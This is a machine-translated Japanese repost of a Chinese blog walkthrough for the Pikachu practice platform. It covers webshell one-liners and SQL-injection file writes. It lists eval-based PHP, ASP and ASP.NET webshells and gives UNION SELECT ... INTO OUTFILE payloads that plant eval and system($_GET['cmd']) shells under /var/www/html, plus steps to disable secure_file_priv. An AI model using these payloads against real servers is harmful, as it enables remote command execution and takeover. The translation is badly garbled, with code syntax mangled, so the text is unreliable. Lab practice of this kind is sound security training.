インジェクションは、SQLピカチュウに基づいて、リモコンテストプラットフォームを-Os

トロイの木馬文

短いとリーントロイの木馬クライアントは、私たちができることを意味し、言語が提供する、または単純なトロイの木馬プログラムを構築するために、オペレーティング・システム・コマンドの機能を実行するために使用され、内部のコードを実行するためにさまざまな機能を使用することです機能自体は、オペレーティング・システムのコマンドを実行するために使用されているため、この機能は、いくつかの、我々が望むものに対応する内部パス操作を行くために、この機能を実行するために、ファイルへのアクセスによって、ファイル内部に直接機能を書かれています内容は実行するためのリモコンとして動作します。隠ぺいのための良い、そして強力な
PHP :; <PHP @Eval($ _ POST [ 'チョッパー'])??>
ASP:<%evalの要求( "チョッパー")%>
ASP.NET:<%@ページ言語= " JScriptの"%> <%のeval( Request.Item ["チョッパー"]、"安全でない「);%>

SQLによるインジェクションの脆弱性は、悪意のあるコードを書く
「/var/www/html/1.txt」OUTFILEに1、2を選択し
、指定したディレクトリに書き込みますOUTFILEへの選択の1.TXT結果
、いくつかの注入ではエコーしませんあなたは、指定したファイルに結果を書き込みOUTFILEに使用して、アクセスを得ることができ
前提条件:
リモートディレクトリ知る1.必要性
2.リモートディレクトリの必要性は、書き込み権限を持っている
(新しいバージョンのMySQLはデフォルトではオフになっフィーチャーデータベースsecure_file_privを開くために3.必要性を、あります書き込み何かにOUTFILEに使用することはできません)

データベース内のルックは
「%安全な%のようなグローバル変数を表示 」;
我々が見ることができ、secure_file_privデフォルトは、我々はそれを空にし変更したいどれも、my.cnfファイルを修正する必要はありません、secure_file_priv = nullを追加して、データベースサービスを再起動します
そこで/ var / www / htmlと設定ディレクトリのパーミッションは、私たちが書く必要がある
し、我々は、ペイロード構築
kの組合SELECTのを「<?PHP @Eval($ _ GET [ 'テスト「])?> "は/ var" outfileの2 INTO / WWW / HTML / 1.php「#
その後提出し、我々はフロントが実際にエコーされているものが表示されない
し、我々は、ファイルがまだに書き込まれていないかどうかを確認するために、サーバーにカット

K '連合SELECT「<?phpのシステム(GET $ _ [' CMDが「])?> "/var/www/html/2.php"#" OUTFILE 2 INTO
システムPHP次の関数は、オペレーティングシステムのコマンドを実行するために使用されます我々は、入力されたGETパラメータを経由して渡すことができ、
その後、私たちは、IPが/ 2.php?CMD = ifconfigコマンドは、彼がカード情報を渡すだろうことがわかった訪問します

公開された13元の記事 ウォンの賞賛1 ビュー252

おすすめ

転載: blog.csdn.net/qq_43499389/article/details/104970500
おすすめ